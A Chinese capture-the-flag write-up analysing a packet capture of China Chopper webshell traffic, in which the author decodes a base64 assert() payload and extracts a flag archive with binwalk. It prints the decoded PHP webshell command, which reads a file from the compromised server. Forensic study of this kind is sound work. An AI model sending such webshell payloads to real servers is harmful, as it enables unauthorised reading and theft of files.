Bugku 分析 中國菜刀


解壓之后得到了一個流量包,只有不到10KB,美滋滋

先抓重點,過濾出http,只有6條數據記錄,3條post,3條response,3條post都是一樣的

隨便打開一條pos

是一個assert斷言,斷言內容是一串base64加密的字符串(最后的%3D先解碼為=)

得到了一串php代碼

@ini_set("display_errors","0");
@set_time_limit(0);
if(PHP_VERSION<\'5.3.0\')
{
    @set_magic_quotes_runtime(0);
};
echo("X@Y");
$F="C:\\\\wwwroot\\\\flag.tar.gz";
$fp=@fopen($F,\'r\');
if(@fgetc($fp))
{
    @fclose($fp);
    @readfile($F);
}
else
{
    echo(\'ERROR:// Can Not Read\');
};
echo("X@Y");
die();

就是說打印一個叫flag(等等flag?)的文件,並在前后打印X@Y

快樂,只要找到flag.tar.gz就好了

最后一條response中就有這個文件

既然是一個文件中包含另一個文件,那就試一試binwalk

提取並解壓,即可得到flag

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM